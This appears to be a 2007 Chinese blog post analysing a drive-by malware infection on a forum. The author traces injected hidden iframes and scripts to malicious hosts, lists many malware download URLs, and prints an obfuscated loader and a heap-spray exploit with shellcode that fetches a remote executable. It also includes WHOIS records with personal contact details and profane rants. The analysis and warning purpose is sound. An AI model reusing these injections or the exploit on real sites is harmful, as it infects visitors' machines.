脑袋,是用来照明的.
299月/070

那一匹匹华丽的马儿….

http://bbs.flasher123.com 同事维护的一个坛子
没装KAV的同志就不要跑去玩儿了
今天进去发现有不少问题...
最大的问题就是被入侵了....还是个道德素质败坏的家伙..
因为...漏洞已经被派上用场了....
所有页面都被挂了马儿+病毒+未知程序『暂未测试.我不是小白鼠呵』
弹出插件——还她母亲的宣称是啥『网页加速器』...心理学的成功运用....
毕竟对于这有点卡的坛子的常客来说...素狠诱人的...
在页面最上头有被加了这一句...我顺著找了下去....
<script src=http://58.61.155.54/js/check.js></script>  

找到
http://58.61.155.54/js/check.htm
最终页面
http://60.191.247.178/mian15.htm
此页面至少有
一个木马Trojan-Downloader.JS.Psyme.oy
一个病毒Virus.JS.HTADropper
光他们网站的一个导航页面 『闪航简介』
所链接的一个帖子.....这五万多的浏览量......
您是本帖的第 55056 个阅读者
http://bbs.flasher123.com/dispbbs.asp?boardID=6&ID=30835
看来这马挂的真可谓是收获/收益不少哈
这安全做的...寒碜..... 磕碜....
据猜测是批量挂的马....或许还留了webshell...或者藏了一句话....也或许后台早已沦陷了.....
瞎....这么大的流量....让这个主给用上了.....那可是Google Adwords都没能安上广告的地儿呢...
高手哇!仰慕一下...... 抬起头仰慕!哈哈..........

下午.公司下发了厚厚一本精神食粮....
全彩页印刷...想必在饿的时候啃上几口...同志们的温饱问题就定能得以解决撒...
话又说回来....对我帮助还真蛮大的.进公司叁年了...还不如下午看三十分钟彩图来的实际
——了解到领导们都长啥样了.这不!以后碰到了好打打招呼哈!

彩图狠漂亮.狠和谐....最失败的就属那封底了...
公司网址居然是错误的... 意淫地把.CN去掉了...
为老外打了免费的广告...还永载我公司史册!赞!

NBGAS.com.cn的详细信息:

Domain Name: nbgas.com.cn
ROID: 20041220s10011s05879959-cn
Domain Status: ok
Registrant Organization: 宁波兴光煤气集团公司
Registrant Name: 陶炳灿
Administrative Email: haihui811@sina.comSponsoring
Registrar: 浙江省电信有限公司
Name Server:ns1.zjdomain.com
Name Server:ns2.zjdomain.com
Registration Date: 2004-12-20 15:40
Expiration Date: 2008-12-20 15:40

Domain Name.......... nbgas.com  
Creation Date........ 2007-09-23  
Registration Date.... 2007-09-23  
Expiry Date.......... 2008-09-23  
Organisation Name.... john buttle  
Organisation Address. 19 rosedale drive  
Organisation Address. west ardsley  
Organisation Address. wakefield  
Organisation Address. WF3 1WG  
Organisation Address. 01  
Organisation Address. GREAT BRITAIN (UK)
Admin Name........... john buttle  
Admin Address........ 19 rosedale drive  
Admin Address........ west ardsley  
Admin Address........ wakefield  
Admin Address........ WF3 1WG  
Admin Address........ 01  
Admin Address........ GREAT BRITAIN (UK)  
Admin Email.......... johnbuttle@nbgas.com  
Admin Phone.......... +1.0113253771  
Admin Fax............
Tech Name............ Office Live Microsoft  
Tech Address......... One Microsoft Way  
Tech Address.........  
Tech Address......... Redmond  
Tech Address......... 98052  
Tech Address......... WA  
Tech Address......... UNITED STATES  
Tech Email........... support@officelive.com  
Tech Phone........... 1.8665915483  
Tech Fax.............   Name Server.......... ns1.officelive.com  
Name Server.......... ns2.officelive.com

nbgas.cc 还没被注册...现在不赶紧...到时候又被抢走...
那...四十周年庆那会儿或许又只能意淫了...

近期晚上没鸟语课....一定要把那该死的权限搞定!!!加油!!!
到时候公布战果哈!到时候图解扫盲.....
诅咒那该死的家伙!在我的地盘挂马!shit!
<iframe src="http://xx.9365.org/ip/1.htm" width=100 height=0></iframe>

分析
http://xx.9365.org/ip/1.htm
内容
<iframe src="http://www.aqshw.cn/837.htm" width=100 height=0></iframe>
<script language="javascript" src="http://ww1.tongji123.com/g1.aspx?id=11903413"></script>

http://www.aqshw.cn/837.htm
连入多个毒网.这里不一一分析..

利用不同的漏洞,下载
http://jjj.jfhwfhw.com/pi/1.exe
http://down.dj7788.cn/momo.exe

http://mm.guama.net/down.exe
http://www.88889999.info/cai/qq.exe

http://www.520018.com/qq/cao.exe
http://www.851733.cn/down.exe
http://www.851733.cn/htm/vip.exe

http://down.dj7788.cn/momo.exe
====>
http://down.dj7788.cn/arp/1.exe
http://down.dj7788.cn/arp/2.exe
http://down.dj7788.cn/arp/3.exe
http://down.dj7788.cn/arp/4.exe
http://down.dj7788.cn/arp/5.exe
http://down.dj7788.cn/arp/6.exe
http://down.dj7788.cn/arp/7.exe
http://down.dj7788.cn/arp/8.exe
http://down.dj7788.cn/arp/9.exe
http://down.dj7788.cn/arp/10.exe
http://down.dj7788.cn/arp/11.exe
http://down.dj7788.cn/arp/12.exe
http://down.dj7788.cn/arp/13.exe
http://down.dj7788.cn/arp/14.exe
http://down.dj7788.cn/arp/15.exe
http://down.dj7788.cn/arp/16.exe
http://down.dj7788.cn/arp/17.exe
http://down.dj7788.cn/arp/18.exe
http://down.dj7788.cn/arp/19.exe
http://18dd.net/new/system22.exe

http://www.88889999.info/cai/qq.exe
===>
http://xz.88889999.info/1.exe
http://xz.88889999.info/2.exe
http://xz.88889999.info/3.exe
http://xz.88889999.info/4.exe
http://xz.88889999.info/5.exe
http://xz.88889999.info/6.exe
http://xz.88889999.info/7.exe
http://xz.88889999.info/8.exe
http://xz.88889999.info/9.exe
http://xz.88889999.info/10.exe
http://xz.88889999.info/11.exe
http://xz.88889999.info/12.exe
http://xz.88889999.info/13.exe
http://xz.88889999.info/14.exe
http://xz.88889999.info/15.exe
http://xz.88889999.info/16.exe
http://xz.88889999.info/17.exe
http://xz.88889999.info/18.exe
http://xz.88889999.info/19.exe
http://xz.88889999.info/20.exe

据说『联想』官方的主页也被挂了这个东西....
变态的东西.......太贱了.......
幸好被我发现了.....明天把漏洞堵上...看谁跟我抢地盘!!!

中国的恶意网站数量占到了全球恶意网站44.8%据英国安全公司Sophos本周一公布的统计结果显示,今年8月份,中国托管着全球近50%的恶意网站.Sophos数据显示,今年8月份中国托管着全球44.8%的恶意网站,排名首位.美国位居第二,托管恶意网站的比例为20.8%.同时,被感染的网页数量也在增长.今年8月,Sophos每天平均检测到5000个新感染的页面.....试问下,哪个个人站长的站没有被挂过马?流量小的,被挂马,流量稍微大点的,就被频繁的挂马,流量再大点的,就被竞争对手攻击,这就是现状,中国网络界的现状....

10月2日更新..
shit!写了一堆又丢了!Q-zone真不是一般烂啊!
Q-zone组差邮箱组老远老远了....无论是创意还是技术.....
Qzone就只有华丽的外表与超多的资源占用率.......
连个自动保存功能都不加...真该向邮件组的取取经....
看来以后还是得用邮箱写...完了再复制过来....

累了...不想再打一遍了....

acc.jqxx.org/live/index.htm
新的挂马页面
一样是连了多个毒网
然后又是老一样的手法
<iframe src="http://web.2008yi.com/" width=0 height=0></iframe>
<iframe src="http://web.2008yi.com/dy.htm" width=0 height=0></iframe>
<iframe src="http://mmm.mm5208.com/vip/index.htm" width=50 height=0></iframe>
<script language="javascript" src="http://ww3.tongji123.com/t1.aspx?id=33339034"></script>

3个框架页面+计数器
每个框架又是几个框架或者....
比如第三个框架就比较的有创意....
不看看源码还真以为是

太忙了!没时间码咯....

未完待续...随时更新.....
敬请关注!!!

=====================更新

这个是好些天的事情了..

那天进去转转的时候发现论坛被挂马了
内存暴涨!TT巨慢!弹出网络加速器安装提示

发现是批量挂的 插了一个 check.js
其内容为

document.write("<iframe src=http://www.mydcentre.com/cert/check.htm width=0 height=0></iframe>")

再看下去 check.htm

<iframe src=http://www.99866.org.cn/music/vip.htm width=0 height=0></iframe>

继续 vip.htm

<iframe src=http://aa.18dd.net/ww/new09.htm?413 width=0 height=0></iframe>
<script language="javascript" src="http://count26.51yes.com/click.aspx?id=266290481&logo=1"></script>

一个18dd.一个51的计数器..

继续转 new09.htm

<iframe width='0' height='0' src='http://aa.18dd.net/aa/kl.htm'></iframe>
<script language="javascript" type="text/javascript" src="http://js.users.51.la/1299644.js"></script>

又一个计数器
大概是为了让上家确认挂马的没作弊吧?!
算钱的时候不会引起纠纷!呵呵...职业的...

到了一个叫kl.htm的页面
源代码显然是被加密过了

<script language =javascript>
function utf8to16(mBm1){var YAgps2,z$EnNkblS3,_J$OCI4,JULuNO5;var K6,VjOzlmshy7;YAgps2=[];_J$OCI4=mBm1["&#92;x6c&#92;x65&#92;x6e&#92;x67&#92;x74&#92;x68"];z$EnNkblS3=0;while(z$EnNkblS3<_J$OCI4){JULuNO5=mBm1["&#92;x63&#92;x68&#92;x61&#92;
.
.
.由于字数限制 略去N多............
.
.
+qO5DKhtF37/JxAbulqh0Mx8U/sjjtUadC1H5vpqqYTi7dMWFprAt6W1mokPTzEHGaOvWAGzdO8qspbE0rz2csHun2KyY/5347k38AH0bkfHBTQ9bQI32dkRqiEY9Y9CWTRllVKuLhnCr0bYJ0YP5o751jlw67Lsb1bNRkKFyec17oo43g==";
t=utf8to16(xxtea_decrypt(base64decode(t), '&#92;x73&#92;x63&#92;x72&#92;x69&#92;x70&#92;x74'));
window["&#92;x64&#92;x6f&#92;x63&#92;x75&#92;x6d&#92;x65&#92;x6e&#92;x74"]["&#92;x77&#92;x72&#92;x69&#92;x74&#92;x65"] (t);
</script>

然后耗费了相当长的时间学习解密....
凌晨比较安静 思路相对比较的清晰

初步解出来

eval("&#92;166&#92;141&#92;162&#92;40&#92;142&#92;151&#92;147&#92;142&#92;154&#92;157&#92;143&#92;153&#92;75&#92;165&#92;156&#92;145&#92;163&#92;143&#92;141&#92;160&#92;145&#92;50&#92;42&#92;45&#92;165&#92;71&#92;60&#92;71&#92;60&#92;45&#92;165&#92;71&#92;60&#92;71&#92;60&#92;42&#92;51&#92;73&#92;166&#92;141&#92;162&#92;40&#92;150&#92;145&#92;141&#92;144&#92;145&#92;162&#92;163&#92;151&#92;172&#92;145&#92;75&#92;62&#92;60&#92;73&#92;166&#92;141&#92;162&#92;40&#92;163&#92;150&#92;145&#92;154&#92;154&#92;143&#92;157&#92;144&#92;145&#92;75&#92;165&#92;156&#92;145&#92;163&#92;143&#92;141&#92;160&#92;145&#92;50&#92;42&#92;45&#92;165&#92;146&#92;63&#92;145&#92;71&#92;45&#92;165
.
.
.由于字数限制 略去N多............
.
.
154&#92;145&#92;156&#92;147&#92;164&#92;150&#92;74&#92;64&#92;60&#92;66&#92;70&#92;51&#92;142&#92;165&#92;146&#92;146&#92;145&#92;162&#92;53&#92;75&#92;42&#92;134&#92;170&#92;60&#92;141&#92;134&#92;170&#92;60&#92;141&#92;134&#92;170&#92;60&#92;141&#92;134&#92;170&#92;60&#92;141&#92;42&#92;73&#92;163&#92;164&#92;157&#92;162&#92;155&#92;56&#92;162&#92;141&#92;167&#92;120&#92;141&#92;162&#92;163&#92;145&#92;50&#92;142&#92;165&#92;146&#92;146&#92;145&#92;162&#92;51")

然后八进制解密

8jinzhi

这就素传说 中的shell code类!
继续解密......

crackcode

就是这个地址....
网警只管政治....
病毒木马非工作职责

卡吧就是好用!哈哈.........
不晓得那个NOD32咋样..有机会试试....

正好在百度知道派上的用场 赚了50分!嘿嘿........

谷歌_知道 初入江湖 二级(385) | 我的提问 | 我的回答 | 我的消息(0/0) | 我的空间 | 百度首页 |  退出

已解决 网页被嵌入木马
悬赏分:50 - 解决时间:2007-11-14 13:48
服务器的网页经常被嵌入一段代码“<iframe src="http://boc.sbb22.com/home/index.htm" width=20 height=0></iframe>”,访问时卡巴就报毒。请问除了限制网页文件的写权限之外,还有没有更好的解决办法和防御措施。
问题补充:它是如何嵌入的?
to 青缕帛衣:用360卫士查过,没有任何问题。
TO qecan:具体是指那方面?它是如何嵌入的?
提问者: qiudesong - 魔法学徒 一级

----------------------------------------------------------------------------------------------

最佳答案

不得不说..先前那两位真的很有幽默感... OTZ

怎么嵌入?所有webshell可以批量挂马...
快2008了..一句话木马还是狠流行...

本人猜测ARP病毒的可能性比较大...

趋势科技ARP病毒专杀工具:
http://www.antiarp.com/newsopen2.asp?ArticleID=24 http://www.011088.com/soft/diannao/fangdushadu/200612/221.html
http://www.51eduw.com/jpsoft/305/475/2006110216970.html
http://www.eryi.org/blog/post/kill-arp-virus.html

防护arp攻击软件最终版-Antiarp安全软件

使用方法:
1、填入网关IP地址,点击〔获取网关地址〕将会显示出网关的MAC地址。点击[自动防护]即可保护当前网卡与该网关的通信不会被第三方监听。注意:如出现这种欺骗提示,这说明攻击者发送了对于此种欺骗数据包来获取网卡的数据包,如果您想追踪攻击来源请记住攻击者的MAC地址,利用MAC地址扫描器可以找出IP 对应的MAC地址.

2、IP地址冲突
如频繁的出现IP地址冲突,这说明攻击者频繁发送ARP欺骗数据包,才会出现IP冲突的警告,利用Anti ARP Sniffer可以防止此类攻击。

3、您需要知道冲突的MAC地址,Windows会记录这些错误。查看具体方法如下:
右击[我的电脑]--[管理]--点击[事件查看器]--点击[系统]--查看来源为[TcpIP]---双击事件可以看到显示地址发生冲突,并记录了该MAC地址,请复制该MAC地址并填入Anti ARP Sniffer的本地MAC地址输入框中(请注意将:转换为-),输入完成之后点击[防护地址冲突],为了使M地址生效请禁用本地网卡然后再启用网卡,在CMD命令行中输入Ipconfig /all,查看当前MAC地址是否与本地MAC地址输入框中的地址相符,如果更改失败请与我联系。如果成功将不再会显示地址冲突。

注意:如果您想恢复默认MAC地址,请点击[恢复默认],为了使地址生效请禁用本地网卡然后再启用网卡。

sbb22.com这个网站经常看到...

iframe src="http://boc.sbb22.com/home/index.htm" width=20 height=0></iframe>
分解
<iframe src="http://aa.18dd.net/ww/new82.htm" width=0 height=0></iframe>
<iframe src="http://boc.sbb22.com/" width=0 height=0></iframe>
<iframe src="http://boc.sbb22.com/2007.htm" width=0 height=0></iframe>
<iframe src="http://mmm.mm5208.com/vv.htm" width=0 height=0></iframe>
<iframe src="http://vip.jqxx.org/xxx.htm" width=0 height=0></iframe>
<iframe src=http://eee.jopenqc.com/xm20.htm width=20 height=0></iframe>
<iframe src=http://abc.djxcn.com/abc/index.htm width=50 height=0></iframe>
<iframe src=http://aa.18dd.net/ww/new301.htm?032 width=20 height=0 frameborder=0></iframe>
<HTML>
<script src=http://eee.jopenqc.com/ee/e.js></script>
</HTML>
<iframe src="http://eee.jopenqc.com/ee/ee1.htm" width="100" height="0" frameborder="0"></iframe>
<iframe src="http://eee.jopenqc.com/ee/ee2.htm" width="100" height="0" frameborder="0"></iframe>
<iframe src="http://eee.jopenqc.com/ee/ee3.htm" width="100" height="0" frameborder="0"></iframe>
<iframe src="http://eee.jopenqc.com/ee/ee4.htm" width="100" height="0" frameborder="0"></iframe>
<iframe src="http://eee.jopenqc.com/ee/ee5.htm" width="100" height="0" frameborder="0"></iframe>
<iframe src="http://eee.jopenqc.com/ee/ee6.htm" width="100" height="0" frameborder="0"></iframe>
<iframe src="http://eee.jopenqc.com/ee/ee.htm" width="100" height="0" frameborder="0"></iframe>
<script language="javascript" type="text/javascript" src="http://js.users.51.la/1358998.js"></script>
<script language="javascript" type="text/javascript" src="http://js.users.51.la/1358616.js"></script>

比如那个 18dd.net 搞到最后是个 shellcode
我菜...搞了好几个小时才....惭愧....

var bigblock=unescape("%u9090%u9090");var headersize=20;var shellcode=unescape("%uf3e9%u0000"+"%u9000%u9090%u5a90%ua164%u0030%u0000%u408b%u8b0c"+"%u1c70%u8bad%u0840%ud88b%u738b%u8b3c%u1e74%u0378"+"%u8bf3%u207e%ufb03%u4e8b%u3314%u56ed%u5157%u3f8b"+"%ufb03%uf28b%u0e6a%uf359%u74a6%u5908%u835f%ufcef"+"%ue245%u59e9%u5e5f%ucd8b%u468b%u0324%ud1c3%u03e1"+"%u33c1%u66c9%u088b%u468b%u031c%uc1c3%u02e1%uc103"+"%u008b%uc303%ufa8b%uf78b%uc683%u8b0e%u6ad0%u5904"+"%u6ae8%u0000%u8300%u0dc6%u5652%u57ff%u5afc%ud88b"+"%u016a%ue859%u0057%u0000%uc683%u5613%u8046%u803e"+"%ufa75%u3680%u5e80%uec83%u8b40%uc7dc%u6303%u646d"+"%u4320%u4343%u6643%u03c7%u632f%u4343%u03c6%u4320"+"%u206a%uff53%uec57%u04c7%u5c03%u2e61%uc765%u0344"+"%u7804%u0065%u3300%u50c0%u5350%u5056%u57ff%u8bfc"+"%u6adc%u5300%u57ff%u68f0%u2451%u0040%uff58%u33d0"+"%uacc0%uc085%uf975%u5251%u5356%ud2ff%u595a%ue2ab"+"%u33ee%uc3c0%u0ce8%uffff%u47ff%u7465%u7250%u636f"+"%u6441%u7264%u7365%u0073%u6547%u5374%u7379%u6574"+"%u446d%u7269%u6365%u6f74%u7972%u0041%u6957%u456e"+"%u6578%u0063%u7845%u7469%u6854%u6572%u6461%u4c00"+"%u616f%u4c64%u6269%u6172%u7972%u0041%u7275%u6d6c"+"%u6e6f%u5500%u4c52%u6f44%u6e77%u6f6c%u6461%u6f54"+"%u6946%u656c%u0041%u7468%u7074%u2f3a%u642f%u776f%u2e6e%u3831%u6464%u6e2e%u7465%u622f%u2f62%u6662%u652e%u6578%u0000");var slackspace=headersize+shellcode.length;while(bigblock.length<slackspace)bigblock+=bigblock;fillblock=bigblock.substring(0,slackspace);block=bigblock.substring(0,bigblock.length-slackspace);while(block.length+slackspace<0x40000)block=block+block+fillblock;memory=new Array();for(x=0;x<300;x++)memory[x]=block+shellcode;var buffer='';while(buffer.length<4068)buffer+="&#92;x0a&#92;x0a&#92;x0a&#92;x0a";storm.rawParse(buffer)

反正就是毒网....
后台打开N个页面浏览器会傻掉的那种....

每次都有51.la计数器存在
看来是比较职业的挂马
据说日入几千元....
也难怪这些东西会道德素质败坏到这种程度
很多网站都把流量.IP卖钱
这已经成为一条完整的产业链了
麻辣隔壁!这样的站...网警不去查封!
却把我们和谐又伟大的陈寿福同学关了进去!
天理何在?!喔..对了..社会主义初级阶段...正常...
麻辣隔壁!狗.日的网警!腾讯的走.狗!
珊瑚虫被那些个托儿诽谤的一无是处!几只喷粪的贱狗!生了狗崽没Ass Hole!
言归正传...

看到 51.la 有人求助
却没人管!!!
真她母亲的狠好!狠河蟹!

标题:是否可以帮我找到这个挂马的人?

我的站,在这段时间里面,遭受到不断的挂马
现在我想找出按个挂马的人:
代码是:
<iframe src="http://boc.sbb22.com/home/index.htm" width=20 height=0></iframe>
进入后
<iframe src="http://boc.sbb22.com/" width=0 height=0></iframe>
<iframe src="http://bbb.mm5208.com/df.htm" width=0 height=0></iframe>
<iframe src="http://vip.jqxx.org/xxx.htm" width=0 height=0></iframe>
<iframe src="http://abc.djxcn.com/abc/index.htm" width=50 height=0></iframe>
进入http://boc.sbb22.com/后是这个代码:
<iframe src="http://aa.18dd.net/ww/new82.htm" width=0 height=0></iframe>
进入后是这个代码:
<iframe width='0' height='0' src='http://aa.18dd.net/aa/ki.htm'></iframe>
<script language="javascript" type="text/javascript" src="http://js.users.51.la/1299644.js"></script>

<iframe width='100' height='100' src='wm/s223.htm'></iframe>
<iframe width='100' height='100' src='wm/du7.htm'></iframe>
<iframe width='100' height='100' src='wm/bu4.htm'></iframe>
<DIV style="display:none"><script src='http://s106.cnzz.com/stat.php?id=521565&web_id=521565&show=pic' language='JavaScript' charset='gb2312'></script>
<script language="javascript" type="text/javascript" src="http://js.users.51.la/1411764.js"></script>
</DIV>
现在 请51LA帮忙查看这两个红色的ID,是否可以帮我找到这个人

现在的互联网...就那样了!
都是那些个傻逼妓者
把熊猫烧香夸成了CIH
把李俊捧为神...
这样的人该被关个几十年
和谐的公安机关没有这么做
这就是后果——病毒泛滥!

我们庆幸地看到还有正义的力量为国内网络界的健康发展.为使用中文的网民能河蟹上网而呐喊

fuck_trojan

评论 (0) 引用 (0)

还没有评论.


发表评论


:y21 :y20 :y19 :y18 :y17 :y16 :y15 :y14 :y13 :y12 :y11 :y10 :y09 :y08 :y07 :y06 :y05 :y04 :y03 :y02 :y01 :wink: :twisted: :roll: :oops: :mrgreen: :lol: :idea: :evil: :cry: :arrow: :?: :51 :049 :048 :047 :045 :044 :043 :041 :040 :038 :036 :035 :033 :030 :028 :027 :022 :021 :020 :019 :018 :015 :014 :012 :011 :010 :008 :004 :002 :-| :-x :-o :-P :-D :-? :) :( :!: :!990 :!99 :!98 :!97 :!96 :!95 :!94 :!93 :!92 :!91 :!90 :!89 :!88 :!87 :!86 :!85 :!84 :!83 :!82 :!81 :!80 :!79 :!78 :!77 :!76 :!75 :!74 :!73 :!72 :!71 :!70 :!69 :!68 :!67 :!66 :!65 :!64 :!63 :!62 :!61 :!60 :!59 :!58 :!57 :!56 :!55 :!54 :!53 :!52 8-O 8)

还没有引用.

Free Web Hosting